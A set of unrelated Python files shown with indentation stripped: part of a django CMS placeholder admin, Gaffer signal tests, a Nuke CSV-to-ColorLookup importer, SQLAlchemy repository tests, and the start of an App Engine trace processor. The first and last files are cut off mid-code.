return HttpResponseBadRequest('order parameter did not have all plugins of the same level in it')
else:
level_plugin.position = x
level_plugin.save()
x += 1
self.post_move_plugin(request, source_placeholder, placeholder, plugin)
json_response = {'reload': requires_reload(PLUGIN_MOVE_ACTION, [plugin])}
return HttpResponse(json.dumps(json_response), content_type='application/json')
@xframe_options_sameorigin
def delete_plugin(self, request, plugin_id):
plugin = get_object_or_404(CMSPlugin.objects.select_related('placeholder'), pk=plugin_id)
if not self.has_delete_plugin_permission(request, plugin):
return HttpResponseForbidden(force_unicode(_("You do not have permission to delete this plugin")))
plugin_cms_class = plugin.get_plugin_class()
plugin_class = plugin_cms_class.model
opts = plugin_class._meta
using = router.db_for_write(plugin_class)
app_label = opts.app_label
(deleted_objects, perms_needed, protected) = get_deleted_objects(
[plugin], opts, request.user, self.admin_site, using)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied(_("You do not have permission to delete this plugin"))
obj_display = force_unicode(plugin)
self.log_deletion(request, plugin, obj_display)
plugin.delete()
self.message_user(request, _('The %(name)s plugin "%(obj)s" was deleted successfully.') % {
'name': force_unicode(opts.verbose_name), 'obj': force_unicode(obj_display)})
self.post_delete_plugin(request, plugin)
return HttpResponseRedirect(admin_reverse('index', current_app=self.admin_site.name))
plugin_name = force_unicode(plugin_pool.get_plugin(plugin.plugin_type).name)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": plugin_name}
else:
title = _("Are you sure?")
context = {
"title": title,
"object_name": plugin_name,
"object": plugin,
"deleted_objects": deleted_objects,
"perms_lacking": perms_needed,
"protected": protected,
"opts": opts,
"app_label": app_label,
}
return TemplateResponse(request, "admin/cms/page/plugin/delete_confirmation.html", context,
current_app=self.admin_site.name)
@xframe_options_sameorigin
def clear_placeholder(self, request, placeholder_id):
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
if not self.has_clear_placeholder_permission(request, placeholder):
return HttpResponseForbidden(force_unicode(_("You do not have permission to clear this placeholder")))
language = request.GET.get('language', None)
plugins = placeholder.get_plugins(language)
opts = Placeholder._meta
using = router.db_for_write(Placeholder)
app_label = opts.app_label
(deleted_objects, perms_needed, protected) = get_deleted_objects(
plugins, opts, request.user, self.admin_site, using)
obj_display = force_unicode(placeholder)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
return HttpResponseForbidden(force_unicode(_("You do not have permission to clear this placeholder")))
self.log_deletion(request, placeholder, obj_display)
placeholder.clear()
self.message_user(request, _('The placeholder "%(obj)s" was cleared successfully.') % {
'obj': force_unicode(obj_display)})
self.post_clear_placeholder(request, placeholder)
return HttpResponseRedirect(admin_reverse('index', current_app=self.admin_site.name))
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": obj_display}
else:
title = _("Are you sure?")
context = {
"title": title,
"object_name": _("placeholder"),
"object": placeholder,
"deleted_objects": deleted_objects,
"perms_lacking": perms_needed,
"protected": protected,
"opts": opts,
"app_label": app_label,
}
return TemplateResponse(request, "admin/cms/page/plugin/delete_confirmation.html", context,
current_app=self.admin_site.name)
class PlaceholderAdmin(PlaceholderAdminMixin, ModelAdmin):
def __init__(self, *args, **kwargs):
warnings.warn("Class PlaceholderAdmin is deprecated and will be removed in 3.1. "
"Instead, combine PlaceholderAdminMixin with admin.ModelAdmin.", DeprecationWarning)
super(PlaceholderAdmin, self).__init__(*args, **kwargs)
class FrontendEditableAdmin(FrontendEditableAdminMixin):
def __init__(self, *args, **kwargs):
warnings.warn("Class FrontendEditableAdmin is deprecated and will be removed in 3.1. "
"Instead, use FrontendEditableAdminMixin.", DeprecationWarning)
super(FrontendEditableAdmin, self).__init__(*args, **kwargs)
|
|
##########################################################################
#
# Copyright (c) 2011-2013, John Haddon. All rights reserved.
# Copyright (c) 2011-2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import StringIO
import unittest
import weakref
import sys
import gc
import IECore
import Gaffer
import GafferTest
class SignalsTest( GafferTest.TestCase ) :
def test( self ) :
def f( a ) :
return int( a )
s = Gaffer.Signal1()
c = s.connect( f )
self.assertEqual( c.connected(), True )
self.assertEqual( c.blocked(), False )
self.assertEqual( s( 5.5 ), 5 )
c.block()
self.assertEqual( c.blocked(), True )
c.unblock()
self.assertEqual( c.blocked(), False )
c.disconnect()
self.assertEqual( c.connected(), False )
def testDisconnectWhenSignalDies( self ) :
def f( a ) :
return int( a )
s = Gaffer.Signal1()
c = s.connect( f )
self.assert_( c.connected() )
del s
self.assert_( not c.connected() )
def test2( self ) :
def f( a, b ) :
return a * b
s = Gaffer.Signal2()
c = s.connect( f )
self.assertEqual( s( 2.0, 4.0 ), 8.0 )
def testCircularRef( self ) :
def default( a ) :
return -1
class A( IECore.V3f ) :
def __init__( self ) :
IECore.V3f.__init__( self )
self.signal = Gaffer.Signal1()
def f( self, n ) :
return int( n * 2 )
a1 = A()
a2 = A()
# connect a signal to always return a value of -1
defaultConnection = a2.signal.connect( default )
self.assertEqual( a2.signal( 2 ), -1 )
# connect a method in
a1.c = a2.signal.connect( Gaffer.WeakMethod( a1.f ) )
self.assertEqual( a2.signal( 2 ), 4 )
# connect a method of a2 to the signal on a1
a2.c = a1.signal.connect( Gaffer.WeakMethod( a2.f ) )
self.assert_( a2.c.connected() )
self.assertEqual( a1.signal( 2 ), 4 )
# we should be able to delete a1 and have it die
# straight away, because the use of WeakMethods in
# the connections should prevent any circular references.
del a1
self.assertEqual( a2.signal( 2 ), -1 )
# as a1 is now dead, a2's connection to a1.signal
# should have died.
self.assert_( not a2.c.connected() )
def testDeletionOfConnectionDisconnects( self ) :
def default( a ) :
return -1
def f( a ) :
return int( a * 10 )
s = Gaffer.Signal1()
dc = s.connect( default )
self.assertEqual( s( 1 ), -1 )
c = s.connect( f )
self.assertEqual( s( 1 ), 10 )
del c
self.assertEqual( s( 1 ), -1 )
def testMany( self ) :
class S( IECore.V3f ) :
instances = 0
def __init__( self, parent ) :
IECore.V3f.__init__( self )
S.instances += 1
self.children = []
self.numConnections = 0
self.signal = Gaffer.Signal1()
if parent :
self.c = parent.signal.connect( self.f )
parent.numConnections += 1
parent.children.append( self )
def f( self, a ) :
r = 1
if self.numConnections!=0 :
r += self.signal( a )
return r
def build( parent, depth=0 ) :
if( depth > 15 ) :
return
else :
s1 = S( parent )
s2 = S( parent )
build( s1, depth + 1 )
build( s2, depth + 1 )
s = S( None )
build( s )
s.signal( 1 )
## Check that Exceptions being thrown in callbacks don't cause additional references
# to be created which would stop or delay collection. This tests a bug whereby the use
# of PyErr_Print caused tracebacks to be stored in sys.last_traceback, which meant that
# references to the T instance below were kept until another exception was thrown.
def testExceptionRefCounting( self ) :
class T( object ) :
def __init__( self, s ) :
# note the use of Gaffer.WeakMethod to avoid creating a circular reference
# from self -> self.connection -> self.callback -> self. this is critical
# when connecting methods of class to a signal.
self.connection = s.memberAddedSignal().connect( Gaffer.WeakMethod( self.callback ) )
def callback( self, s, n ) :
raise Exception
s = Gaffer.StandardSet()
t = T( s )
w = weakref.ref( t )
realStdErr = sys.stderr
sio = StringIO.StringIO()
try :
sys.stderr = sio
s.add( Gaffer.Node() )
finally :
sys.stderr = realStdErr
del t
self.assert_( w() is None )
self.assert_( "Exception" in sio.getvalue() )
def test0Arity( self ) :
def one() :
return 1
s = Gaffer.Signal0()
c = s.connect( one )
self.assertEqual( s(), 1 )
def testGenericPythonSignals( self ) :
def one() :
return "one"
def two() :
return "two"
s = Gaffer.Signal0()
c1 = s.connect( one )
c2 = s.connect( two )
self.assertEqual( s(), "two" )
def testGenericPythonSignalsWithCombiner( self ) :
def myCombiner( slotResults ) :
l = []
for r in slotResults :
l.append( r )
return l
def add( a, b ) :
return a + b
def mult( a, b ) :
return a * b
s = Gaffer.Signal2( myCombiner )
addConnection = s.connect( add )
multConnection = s.connect( mult )
self.assertEqual( s( 2, 4 ), [ 6, 8 ] )
def testPythonResultCombinersCanSkipSlots( self ) :
def myCombiner( slotResults ) :
for r in slotResults :
if r :
return r
return False
def slot1() :
self.numCalls += 1
return True
def slot2() :
self.numCalls += 1
return False
s = Gaffer.Signal0( myCombiner )
c1 = s.connect( slot1 )
c2 = s.connect( slot2 )
self.numCalls = 0
self.assertEqual( s(), True )
self.assertEqual( self.numCalls, 1 )
def testGroupingAndOrdering( self ) :
values = []
def f( value ) :
values.append( value )
s = Gaffer.Signal0()
c1 = s.connect( IECore.curry( f, "one" ) )
c2 = s.connect( IECore.curry( f, "two" ) )
s()
self.assertEqual( values, [ "one", "two" ] )
del values[:]
c1 = s.connect( 1, IECore.curry( f, "one" ) )
c2 = s.connect( 0, IECore.curry( f, "two" ) )
s()
self.assertEqual( values, [ "two", "one" ] )
del values[:]
c1 = s.connect( IECore.curry( f, "one" ) )
c2 = s.connect( 0, IECore.curry( f, "two" ) )
s()
self.assertEqual( values, [ "two", "one" ] )
def testSlotQueries( self ) :
def f() :
pass
s = Gaffer.Signal0()
self.assertTrue( s.empty() )
self.assertEqual( s.num_slots(), 0 )
c = s.connect( f )
self.assertFalse( s.empty() )
self.assertEqual( s.num_slots(), 1 )
del c
self.assertTrue( s.empty() )
self.assertEqual( s.num_slots(), 0 )
def testNonScopedConnection( self ) :
self.numCalls = 0
def f() :
self.numCalls += 1
s = Gaffer.Signal0()
c = s.connect( f, scoped = False )
self.assertEqual( self.numCalls, 0 )
s()
self.assertEqual( self.numCalls, 1 )
c.block( True )
s()
self.assertEqual( self.numCalls, 1 )
c.block( False )
s()
self.assertEqual( self.numCalls, 2 )
# If we drop our reference to the slot,
# it should still be alive because the
# signal is referencing it (because it
# is connected).
w = weakref.ref( f )
del f
self.assertTrue( w() is not None )
# And it should still be triggered when
# we call the signal.
s()
self.assertEqual( self.numCalls, 3 )
# And it should finally die when the
# signal dies.
del s
self.assertTrue( w() is None )
if __name__ == "__main__":
unittest.main()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The Foundry Nuke - CSV File to ColorLookup Node
===============================================
Defines *The Foundry Nuke* *ColorLookup* node creation objects from *.csv*
files.
"""
# from __future__ import unicode_literals
import csv
try:
import nuke
except ImportError:
pass
import os
from collections import namedtuple
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2016 - Colour Developers'
__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = ['COLOR_LOOKUP_CURVES_TEMPLATE',
'Point',
'CurvesInformation',
'Curve',
'Lookup',
'curve_data',
'parse_curve_data_header',
'parse_curve_data',
'curve_axis_values',
'curve',
'lookup',
'format_curve_data',
'color_lookup_node',
'import_curves_data_csv_file']
COLOR_LOOKUP_CURVES_TEMPLATE = (
"""master {{{0}}}
red {{{1}}}
green {{{2}}}
blue {{{3}}}
alpha {{{4}}}""")
Point = namedtuple('Point', ('x', 'y'))
CurvesInformation = namedtuple('CurvesInformation',
('curve', 'axis', 'values'))
class Curve(object):
"""
Stores curve data with the :class:`Point` class.
Parameters
----------
x : tuple or list
x: X axis data.
y : tuple or list
y: Y axis data.
"""
def __init__(self, x=None, y=None):
points = []
if not x:
for i in range(len(y)):
points.append(Point(float(i) / len(y), y[i]))
elif not y:
for i in range(len(x)):
points.append(Point(x[i], float(i) / len(x)))
else:
for i in range(len(x)):
points.append(Point(x[i], y[i]))
self.points = points
class Lookup(object):
"""
Defines the lookup master, red, green, blue and alpha curves using the
:class:`Curve` class.
Parameters
----------
master_curve : Curve
master_curve: Master curve.
red_curve : Curve
red_curve: Red curve.
green_curve : Curve
green_curve: Green curve.
blue_curve : Curve
blue_curve: Blue curve.
alpha_curve : Curve
alpha_curve: Alpha curve.
"""
def __init__(self,
master_curve=None,
red_curve=None,
green_curve=None,
blue_curve=None,
alpha_curve=None):
self.master_curve = master_curve if isinstance(
master_curve, Curve) else Curve()
self.red_curve = red_curve if isinstance(
red_curve, Curve) else Curve()
self.green_curve = green_curve if isinstance(
green_curve, Curve) else Curve()
self.blue_curve = blue_curve if isinstance(
blue_curve, Curve) else Curve()
self.alpha_curve = alpha_curve if isinstance(
alpha_curve, Curve) else Curve()
def curve_data(file):
"""
Reads the curve data from given CSV file.
Parameters
----------
file : unicode
file: CSV file.
Returns
-------
list
CSV data.
"""
with open(file, 'rb') as csv_file:
return list(csv.reader(csv_file, delimiter=','))
def parse_curve_data_header(header):
"""
Parses the curve data header.
Parameters
----------
header : list
header: Curve data header.
Returns
-------
CurvesInformation
Curves information.
"""
curves_information = []
for name, axis in [x.lower().split() for x in header]:
curves_information.append(CurvesInformation(name, axis, []))
return curves_information
def parse_curve_data(data):
"""
Parses the curve data.
Parameters
----------
data : list
data: Curve data.
Returns
-------
CurvesInformation
Curves information.
"""
curves_information = parse_curve_data_header(data.pop(0))
for row in data:
for i, column in enumerate(row):
curves_information[i].values.append(column)
return curves_information
def curve_axis_values(curves_information, name, axis):
"""
Returns the curve axis values.
Parameters
----------
curves_information : CurvesInformation
curves_information: Curves information.
name : unicode
name: Curve name.
axis : unicode
axis: Axis.
Returns
-------
CurvesInformation
Curves information.
"""
for curve_information in curves_information:
if curve_information.curve == name and curve_information.axis == axis:
return curve_information.values
return []
def curve(curves_information, name):
"""
Returns a curve using given :class:`curves_information` class instance.
Parameters
----------
curves_information : CurvesInformation
curves_information: Curves information.
name : unicode
name: Curve name.
Returns
-------
Curve
Curve.
"""
return Curve(x=curve_axis_values(curves_information, name, 'x'),
y=curve_axis_values(curves_information, name, 'y'))
def curves_information_to_lookup(curves_information):
"""
Returns a :class:`Lookup` class instance using given
:class:`curves_information` class instance.
Parameters
----------
curves_information : CurvesInformation
curves_information: Curves information.
Returns
-------
Lookup
Lookup.
"""
return Lookup(curve(curves_information, 'master'),
curve(curves_information, 'red'),
curve(curves_information, 'green'),
curve(curves_information, 'blue'),
curve(curves_information, 'alpha'))
def format_curve_data(curve):
"""
Formats given :class:`Curve` class instance data.
Parameters
----------
curve : Curve
curve: Curve.
Returns
-------
unicode
Formatted curve data.
"""
curve_data = ''
for point in curve.points:
curve_data += 'x{0} {1} '.format(point.x, point.y)
return 'curve C {0}'.format(
curve_data) if curve_data is not '' else 'curve C 0 1'
def color_lookup_node(file, template=COLOR_LOOKUP_CURVES_TEMPLATE):
"""
Creates the *Nuke* *ColorLookup* node code using given CSV file.
Parameters
----------
file : unicode
file: CSV file.
template : unicode, optional
template: Template used for formatting.
Returns
-------
ColorLookup
ColorLookup node.
"""
color_lookup = nuke.nodes.ColorLookup(name='ColorLookup')
lookup = curves_information_to_lookup(parse_curve_data(curve_data(file)))
color_lookup.knob('lut').fromScript(
template.format(format_curve_data(lookup.master_curve),
format_curve_data(lookup.red_curve),
format_curve_data(lookup.green_curve),
format_curve_data(lookup.blue_curve),
format_curve_data(lookup.alpha_curve)))
basename = os.path.splitext(os.path.basename(file))[0].split("-")
if len(basename) > 1:
label = "\n".join([s.strip() for s in basename])
else:
label = basename[0]
color_lookup.knob('label').setValue(label)
return color_lookup
def import_curves_data_csv_file():
"""
Import user curves data CSV file as a *Nuke* *ColorLookup* node.
Returns
-------
ColorLookup
ColorLookup node.
"""
file = nuke.getFilename('Choose ColorLookup Node Curves Data CSV File',
'*.csv')
if file is not None:
if os.path.exists(file):
return color_lookup_node(file)
|
|
from datetime import datetime
import pytest
from app.domain.entities import Admin, Host, Service
from app.domain.errors import NoAdministratorFound
from app.repository.sqlalchemy import (SqlalchemyAdminRepo, SqlalchemyHostRepo,
SqlalchemyServiceRepo)
from app.repository.sqlalchemy.models import db
from tests.unit.utils import FlaskAppContextEnvironment
class DbEnvironment(FlaskAppContextEnvironment):
@pytest.fixture
def table(self, app_context):
db.drop_all()
db.create_all()
yield
db.session.remove()
db.drop_all()
class TestAdminRepoImpl(DbEnvironment):
@pytest.fixture(scope='class')
def repo(self):
return SqlalchemyAdminRepo()
@pytest.fixture
def admin1_data(self):
return {
'username': 'test',
'original_password': '123',
'updated_at': datetime.now()
}
@pytest.fixture
def admin2_data(self):
return {
'username': 'test2',
'original_password': '1234',
'updated_at': datetime.now()
}
def test_admin_persistence(self, table, repo, admin1_data):
repo.set(Admin(**admin1_data))
admin = repo.get()
assert admin.username == admin1_data['username']
assert admin.password != admin1_data['original_password']
def test_multiple_admin_persistence(self, table, repo, admin1_data,
admin2_data):
repo.set(Admin(**admin1_data))
repo.set(Admin(**admin2_data))
admin = repo.get()
assert admin.username == admin2_data['username']
assert admin.password != admin2_data['original_password']
def test_no_admin_create(self, table, repo):
with pytest.raises(NoAdministratorFound):
repo.get()
class TestHostRepoImpl(DbEnvironment):
@pytest.fixture(scope='class')
def repo(self):
return SqlalchemyHostRepo()
@pytest.fixture
def host1_data(self):
return {'id': 'fake_id1', 'name': 'localhost', 'detail': 'this machine',
'address': '127.0.0.1'}
@pytest.fixture
def host2_data(self):
return {'id': 'fake_id2', 'name': 'server1',
'detail': 'remote machine 1',
'address': '8.8.8.8'}
def test_next_identity(self, repo):
new_id = repo.next_identity()
assert type(new_id) is str
next_new_id = repo.next_identity()
assert new_id != next_new_id
def test_save_one_host(self, table, repo, host1_data, host2_data):
host = Host(**host1_data)
repo.save(host)
hosts_from_persistence = repo.all()
assert len(hosts_from_persistence) == 1
host_from_persistence = hosts_from_persistence[0]
for key in host1_data.keys():
assert getattr(host, key) == getattr(host_from_persistence, key)
def test_save_multiple_host(self, table, repo, host1_data,
host2_data):
hosts = [Host(**host1_data), Host(**host2_data)]
for host in hosts:
repo.save(host)
hosts_from_persistence = repo.all()
assert len(hosts) == 2
for host, host_from_persistence in zip(hosts, hosts_from_persistence):
for key in host1_data.keys():
assert getattr(host, key) == getattr(host_from_persistence, key)
def test_save_modified_host(self, table, repo, host1_data, host2_data):
host = Host(**host1_data)
repo.save(host)
hosts_from_persistence = repo.all()
assert len(hosts_from_persistence) == 1
host.name, host.detail, host.address = host2_data['name'], host2_data[
'detail'], host2_data['address']
repo.save(host)
hosts_from_persistence = repo.all()
assert len(hosts_from_persistence) == 1
host_from_persistence = hosts_from_persistence[0]
for key in host2_data.keys():
if key == 'id':
assert host1_data['id'] == host_from_persistence.id
else:
assert host2_data[key] == getattr(host_from_persistence, key)
def test_delete(self, table, repo, host1_data):
host = Host(**host1_data)
repo.save(host)
repo.delete(repo.all()[0].id)
assert len(repo.all()) == 0
def test_query_by_id(self, table, repo, host1_data):
host = Host(**host1_data)
repo.save(host)
saved_host = repo.host_of_id(host.id)
for key in host1_data.keys():
assert getattr(host, key) == getattr(saved_host, key)
class TestServiceRepoImpl(DbEnvironment):
@pytest.fixture(scope='class')
def host_repo(self):
return SqlalchemyHostRepo()
@pytest.fixture(scope='class')
def service_repo(self):
return SqlalchemyServiceRepo()
@pytest.fixture
def host_data(self):
return {'id': 'fake_id', 'name': 'localhost', 'detail': 'this machine',
'address': '127.0.0.1'}
@pytest.fixture
def service1_data(self):
return {'id': 'fake_id1', 'name': 'nginx', 'detail': 'nginx service',
'port': 80}
@pytest.fixture
def service2_data(self):
return {'id': 'fake_id2', 'name': 'postgres',
'detail': 'postgres database', 'port': 5432}
def test_next_identity(self, service_repo):
new_id = service_repo.next_identity()
assert type(new_id) is str
next_new_id = service_repo.next_identity()
assert new_id != next_new_id
def test_save_service(self, table, host_repo, service_repo,
host_data, service1_data, service2_data):
host_repo.save(Host(**host_data))
host_from_persistence = host_repo.all()[0]
service1 = Service(**service1_data)
service2 = Service(**service2_data)
service_repo.save(host_from_persistence.id, service1)
service_repo.save(host_from_persistence.id, service2)
host_from_persistence = host_repo.all()[0]
services_from_persistence = host_from_persistence.services
assert len(services_from_persistence) == 2
service1_from_persistence = services_from_persistence[0]
for key in service1_data.keys():
assert getattr(service1, key) == getattr(service1_from_persistence,
key)
service2_from_persistence = services_from_persistence[1]
for key in service1_data.keys():
assert getattr(service2, key) == getattr(service2_from_persistence,
key)
def test_save_modified_service(self, table, host_repo, service_repo,
host_data, service1_data, service2_data):
host_repo.save(Host(**host_data))
host_from_persistence = host_repo.all()[0]
service = Service(**service1_data)
service_repo.save(host_from_persistence.id, service)
assert len(host_repo.all()[0].services) == 1
service.name, service.detail, service.port = service2_data['name'], \
service2_data['detail'], \
service2_data['port']
service_repo.save(host_from_persistence.id, service)
services_from_persistence = host_repo.all()[0].services
assert len(services_from_persistence) == 1
service_from_persistence = services_from_persistence[0]
for key in service2_data.keys():
if key == 'id':
assert service1_data['id'] == service_from_persistence.id
else:
assert service2_data[key] == getattr(service_from_persistence,
key)
def test_delete(self, table, host_repo, service_repo,
host_data, service1_data, service2_data):
host_repo.save(Host(**host_data))
service = Service(**service1_data)
service_repo.save(host_repo.all()[0].id, service)
service_id = host_repo.all()[0].services[0].id
service_repo.delete(service_id)
assert len(host_repo.all()[0].services) == 0
|
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gzip
import os
import sys
import re
import json
from StringIO import StringIO
from datetime import datetime
from datetime import timedelta
from urlparse import urlparse
from dateutil.parser import parse as dateparse
from google.appengine.ext import ndb
from telemetry.timeline import model as model_module
from telemetry.timeline import trace_data as trace_data_module
from telemetry.timeline import event as trace_event
from models import Project
from models import Action
from models import ActionDetail
from models import ActionDetailExtended
from models import Log
class TraceProcessor():
__temp_actions = {}
__js_blame = {}
def log (self, project, trace_info, extended_info,
status, records_imported=0):
if (project == None):
return
log = Log(
parent=project.key,
filename=trace_info.filename,
date=datetime.today(),
status=status,
records_imported=records_imported
)
log.put()
def process (self, project, trace_string, trace_info, extended_info):
try:
if re.search('json$', trace_info.filename):
# Re-encode to ISO-8859-1
trace_string = trace_string.decode('UTF-8', 'ignore')
trace_string = trace_string.encode('ISO-8859-1', 'ignore')
trace_json = json.loads(trace_string)
elif re.search('json.gz$', trace_info.filename):
gzip_trace_string = gzip.GzipFile(
fileobj=StringIO(trace_string)
).read()
trace_json = json.loads(gzip_trace_string)
else:
self.log(project, trace_info, extended_info,
'Error reading file: neither .json nor .json.gz')
return
except Exception, e:
self.log(project, trace_info, extended_info,
'JSON parse error')
return
try:
parsed_data = trace_data_module.TraceData(trace_json)
model = model_module.TimelineModel(parsed_data)
processes = model.GetAllProcesses()
except Exception, e:
self.log(project, trace_info, extended_info,
'Error processing the file.')
return
summarizable = []
trace_json = None
# If there is a process to filter by, use that. Otherwise
# find all non-empty and non-tracing processes and append
# them to the list.
if (trace_info.process != None):
summarizable = [
x for x in processes
if x.labels == trace_info.process]
else:
for p in processes:
if (p.labels != None and
p.labels != 'chrome://tracing' and
p.labels != 'BackgroundPage'):
summarizable.append(p)
# There should only be one process to process...
if len(summarizable) == 0:
self.log(project, trace_info, extended_info, 'No process found')
elif len(summarizable) > 1:
self.log(project, trace_info, extended_info,
'Multiple tabs (trace process) found.')
else:
return self.analyze_trace_and_append_actions(
project,
trace_info,
summarizable.pop(),
model.bounds,
extended_info)
def analyze_trace_and_append_actions (self, project, trace_info, process,
bounds, extended_info):
threads = self.get_threads(process)
renderer_thread = self.get_thread_by_name(process, 'CrRendererMain')
time_ranges = self.get_time_ranges(renderer_thread)
labels = extended_info['labels']
secret = extended_info['secret']
status = ''
records_imported = []
if project == None:
status = "No project found with secret %s" % secret
return None
# If a single label is provided...
if (self.is_single_label(labels)):
labels = self.wrap_labels_in_list_if_needed(labels)
#...and the Action of that label is for a Load Action, the trace is
# considered to match entirely to the Action. If the Action is not a
# Load Action, then only the ranges will be matched.
if (self.label_is_for_load_action(project, labels)):
status = 'Single label (%s), label is for load action' % labels[0]
# Ignore time ranges and reset to the whole window
time_ranges = [trace_event.TimelineEvent(category='Load',
name=labels[0],
start=bounds.min,
duration=(bounds.max - bounds.min))]
records_imported = self.create_action_details_from_trace(project,
labels, time_ranges, threads, trace_info, extended_info)
# If the Action of that label is not a Load Action, then look for
# time ranges of that label.
else:
status = 'Single label (%s), label is not for a Load Action' % labels[0]
records_imported = self.create_action_details_from_trace(project,
labels, time_ranges, threads, trace_info, extended_info)
# If multiple labels are provided and the trace contains ranges,
# those ranges will be mapped to existing Actions in the Project
# with those labels.
elif (self.is_multi_label(labels) and len(time_ranges) > 0):
status = 'Multiple labels, trace contains ranges'
records_imported = self.create_action_details_from_trace(project,
labels, time_ranges, threads, trace_info, extended_info)
# If multiple labels are provided and the trace does not contain ranges,
# no Actions will be findable, so the import will be a no-op.
elif (self.is_multi_label(labels) and len(time_ranges) == 0):
# If, however, only one of the labels provided is for a Load Action,
# then the trace will be assumed to match to that Action.
action = self.get_single_load_action_from_multi_label(project, labels)
# Only go ahead if we found a single Load Action
if (action != None):
status = ('Multiple labels, trace contains no ranges. '
'Single Load Action label found.')
# Ignore time ranges and reset to the whole window
time_ranges = [trace_event.TimelineEvent(category=action.name,
name=action.label,
start=bounds.min,
duration=(bounds.max - bounds.min))]
records_imported = self.create_action_details_from_trace(project,
[action.name], time_ranges, threads, trace_info, extended_info)
# If no labels are provided..
elif (len(labels) == 0):
# ...and no ranges exist, then a match will be assumed if and
# only if there is one Load Action in the Project.
if (len(time_ranges) == 0):
action = self.get_single_load_action_from_project(project)
if (action != None):
status = ('No labels, trace contains no ranges. '
'Single Load Action in project found.')
time_ranges = [trace_event.TimelineEvent(category=action.name,
name=action.label,
start=bounds.min,
duration=(bounds.max - bounds.min))]
records_imported = self.create_action_details_from_trace(project,
[action.name], time_ranges, threads, trace_info, extended_info)
else:
status = ('No labels, trace contains no ranges. '
'Zero or multiple Load Actions found.')
# If time ranges do exist, then Actions will be created for those time
# ranges as necessary during the import.
elif (len(time_ranges) > 0):
status = ('No labels, trace contains ranges. '
'Actions will be created on demand.')
records_imported = self.create_action_details_from_trace(project,
[], time_ranges, threads, trace_info, extended_info)
else:
status = 'Unknown import error.'
self.log(project, trace_info, extended_info, status, len(records_imported))
return records_imported
def get_threads (self, process):
return [
t for t in process.threads.values()
if (t.name == 'Compositor' or
t.name == 'CrRendererMain' or
re.match('CompositorTileWorker', t.name))
]
def get_thread_by_name (self, process, name):
threads = [
r for r in process.threads.values()
if r.name == name
]
if (len(threads) == 0):
return None
return threads[0]
def get_time_ranges (self, thread):
return [
y for y in thread.GetAllEvents()
if (y.category == 'blink.console' and
y.thread_start != None)
]
def get_label (self, labels):
if (type(labels) is list):
return labels[0]
elif (type(labels) is str or type(labels) is unicode):
return labels
def wrap_labels_in_list_if_needed (self, labels):
if type(labels) is list:
return labels
label_list = map(str, labels.split(','))
return map(str.strip, label_list)
def is_single_label (self, labels):
return (type(labels) is str or
type(labels) is unicode or
(type(labels) is list and len(labels) == 1))
def is_multi_label (self, labels):
return (type(labels) is list and len(labels) > 1)
def label_is_for_load_action (self, project, labels):
if not self.is_single_label(labels):
return False
label = self.get_label(labels)
action = Action.query(ancestor=project.key).filter(
Action.label==label).get()
return (action != None and action.type == 'Load')
def get_single_load_action_from_project (self, project):
# Check all Actions.
actions = Action.query(ancestor=project.key)
load_action = None
for action in actions:
if action.type == 'Load':
# If we've just hit the first Load Action, set it, otherwise
# unset it and break out of the loop.
if load_action == None:
load_action = action
else:
load_action = None
break
# Return either None or the only load action
return load_action
def get_single_load_action_from_multi_label (self, project, labels):
if not self.is_multi_label(labels):
return None
actions = Action.query(ancestor=project.key)
load_action = None
for action in actions:
# Skip over any Actions that aren't in the set of labels.
if action.name not in labels:
continue
if action.type == 'Load':
# If we've just hit the first Load Action, set it, otherwise
# unset it and break out of the loop.
if load_action == None:
load_action = action
else:
load_action = None
break
# Return either None or the only load action
return load_action
def get_action_from_label (self, label, create_action_if_needed, project):
action = Action.query(ancestor=project.key).filter(
Action.label==label).get()
if (action == None and create_action_if_needed):
# Create a temp store of actions created just for this run.
if label not in self.__temp_actions:
action = Action(parent=project.key,
name=label,
type='Response',
label=label,
x_axis=0,
y_axis=0,
y_axis_max='duration')
action.put()
self.__temp_actions[label] = action
else:
action = self.__temp_actions[label]
return action
def get_javascript_url_from_stack_info (self, slice):
url = None
if 'data' not in slice.args:
return url
